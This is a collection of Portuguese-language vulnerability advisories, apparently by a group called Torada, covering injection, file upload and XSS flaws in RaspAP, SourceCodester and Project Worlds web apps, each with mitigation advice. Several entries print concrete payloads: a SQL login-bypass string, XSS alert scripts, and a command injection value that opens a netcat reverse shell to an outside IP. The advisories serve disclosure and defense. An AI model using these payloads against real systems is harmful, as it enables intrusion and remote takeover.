Torada

**Nome do software vulnerável e versões afetadas** RaspAP raspap-webgui versão 3.0.9 **Descrição** Uma falha crítica afeta o processamento do arquivo `includes/provider.php` no componente HTTP POST Request Handler. A manipulação do argumento `country` leva à injeção de código. Essa falha pode ser explorada remotamente. O fornecedor foi contatado sobre esta divulgação, mas não respondeu. **Recomendações** Para o RaspAP raspap-webgui versão 3.0.9, considere desativar o arquivo `includes/provider.php` ou restringir o acesso ao componente HTTP POST Request Handler até que uma correção esteja disponível. Evite usar o argumento `country` no endpoint da API afetado até que a vulnerabilidade seja resolvida. No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Sistema de Gestão de Reclamações SourceCodester, versão 1.0 **Descrição** Uma falha crítica afeta o componente “Seção de Reclamações”, especificamente o arquivo `users/register-complaint.php`, permitindo o envio irrestrito de arquivos. O ataque pode ser iniciado remotamente. A falha já foi divulgada publicamente e pode estar sendo explorada. **Recomendações** Para o Sistema de Gerenciamento de Reclamações SourceCodester versão 1.0, considere desativar o arquivo `users/register-complaint.php` ou restringir o acesso à Seção de Registro de Reclamações até que um patch esteja disponível. Como solução temporária, restrinja a funcionalidade de upload no componente afetado para minimizar o risco de exploração. No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** SourceCodester Complete File Management System versão 1.0 **Descrição** Foi encontrada uma falha crítica no componente Formulário de Login do software afetado, especificamente no arquivo users/index.php. O argumento `username` está vulnerável a manipulação, o que pode levar a injeção de SQL quando entradas como `torada%27+or+%271%27+%3D+%271%27+--+-` são utilizadas. Esta falha pode ser explorada remotamente. **Recomendações** Para o SourceCodester Complete File Management System versão 1.0, considere desativar o componente Formulário de Login ou restringir o acesso ao arquivo `users/index.php` até que uma correção esteja disponível. Evite usar o argumento `username` na funcionalidade de login afetada para minimizar o risco de exploração. No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.

**Nome do software vulnerável e versões afetadas** SourceCodester Complete File Management System versão 1.0 **Descrição** Foi identificada uma vulnerabilidade crítica no componente do formulário de login de administrador do arquivo /admin/. A manipulação do argumento `username` com uma entrada específica leva a uma injeção de SQL. O ataque pode ser executado remotamente. **Recomendações** Para o SourceCodester Complete File Management System versão 1.0, como solução temporária, considere restringir o acesso ao endpoint `/admin/` até que um patch esteja disponível. Evite usar o argumento `username` no Formulário de Login de Administrador afetado até que o problema seja resolvido. No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.

**Nome do software vulnerável e versões afetadas** MiczFlor RPi-Jukebox-RFID, versões até 2.5.0 **Descrição** Uma vulnerabilidade crítica afeta uma funcionalidade desconhecida do arquivo userScripts.php do componente HTTP Request Handler. A manipulação do argumento `folder` com a entrada `;nc 104.236.1.147 4444 -e /bin/bash;` leva à injeção de comando no sistema operacional. O ataque pode ser lançado remotamente. A exploração foi divulgada ao público e pode estar em uso. **Recomendações** Para as versões do MiczFlor RPi-Jukebox-RFID até a 2.5.0, como solução temporária, considere desativar o componente HTTP Request Handler até que um patch esteja disponível. Restrinja o acesso ao arquivo userScripts.php para minimizar o risco de exploração. Evite usar o argumento `folder` no HTTP Request Handler afetado até que o problema seja resolvido. No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Project Worlds Student Project Allocation System versão 1.0 **Descrição** Foi encontrada uma vulnerabilidade no Módulo de Login de Administrador, afetando especificamente o arquivo admin login.php. A falha permite a execução de scripts entre sites (cross-site scripting) por meio da manipulação do argumento `msg` com uma entrada maliciosa, como `test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E`. Isso pode ser iniciado remotamente. A exploração foi divulgada publicamente. **Recomendações** Para o Sistema de Alocação de Projetos Estudantis do Project Worlds versão 1.0, como solução temporária, considere restringir o acesso ao arquivo `admin login.php` e ao argumento `msg` no Módulo de Login de Administrador para minimizar o risco de exploração. No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Project Worlds Online Time Table Generator versão 1.0 **Descrição** Foi identificada uma falha crítica no arquivo course ajax.php, na qual a manipulação do argumento `id` leva a uma injeção de SQL. Isso pode ser iniciado remotamente. A falha foi divulgada publicamente e pode ser explorada. **Recomendações** Para o Project Worlds Online Time Table Generator versão 1.0, como solução temporária, considere restringir o acesso ao arquivo `course ajax.php` ou desativar a manipulação do argumento `id` até que um patch esteja disponível. No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta falha.

**Nome do software vulnerável e versões afetadas** Sistema de gerenciamento de visitantes do Project Worlds, versão 1.0 **Descrição** Foi encontrada uma vulnerabilidade no Sistema de Gerenciamento de Visitantes do Project Worlds. Ela foi classificada como problemática e afeta uma função desconhecida do arquivo dataset.php do componente URL Handler. A manipulação do argumento `name` com a entrada "><script>alert(‘torada’)</script> leva a um ataque de cross-site scripting. É possível lançar o ataque remotamente. **Recomendações** Para o Sistema de Gerenciamento de Visitantes do Project Worlds versão 1.0, considere desativar o arquivo `dataset.php` ou restringir o acesso a ele até que uma correção esteja disponível. Evite usar o argumento `name` no componente URL Handler afetado para minimizar o risco de exploração. No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.